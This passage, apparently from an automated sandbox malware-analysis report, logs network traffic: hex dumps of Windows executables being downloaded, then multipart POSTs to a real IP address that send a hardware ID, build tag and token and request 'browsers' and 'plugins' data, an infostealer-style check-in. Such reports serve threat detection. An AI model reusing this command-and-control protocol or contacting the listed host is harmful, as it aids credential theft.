00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 14:06:57 GMTContent-Type: application/octet-streamContent-Length: 3197440Last-Modified: Sat, 07 Dec 2024 13:54:07 GMTConnection: keep-aliveETag: "6754537f-30ca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 48 22 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 bc 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bc 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6b 75 6f 6e 63 66 69 00 10 2a 00 00 b0 06 00 00 0e 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 67 73 6d 62 69 73 72 00 10 00 00 00 c0 30 00 00 04 00 00 00 a4 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 a8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 14:08:09 GMTContent-Type: application/octet-streamContent-Length: 1840640Last-Modified: Sat, 07 Dec 2024 13:53:52 GMTConnection: keep-aliveETag: "67545370-1c1600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 f0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 49 00 00 04 00 00 3d 64 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 68 68 68 61 70 69 64 00 b0 19 00 00 30 2f 00 00 a6 19 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 69 6f 6c 67 72 64 7a 00 10 00 00 00 e0 48 00 00 04 00 00 00 f0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 48 00 00 22 00 00 00 f4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 45 32 35 42 39 46 34 41 32 36 39 39 32 39 33 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="hwid"B61E25B9F4A2699293130------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="build"drum------HIIEGHJJDGHCAKEBGIJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 2d 2d 0d 0a Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="message"browsers------DHDHJJJECFIECBGDGCAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"plugins------HDAFHIDGIJKJKECBGDBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 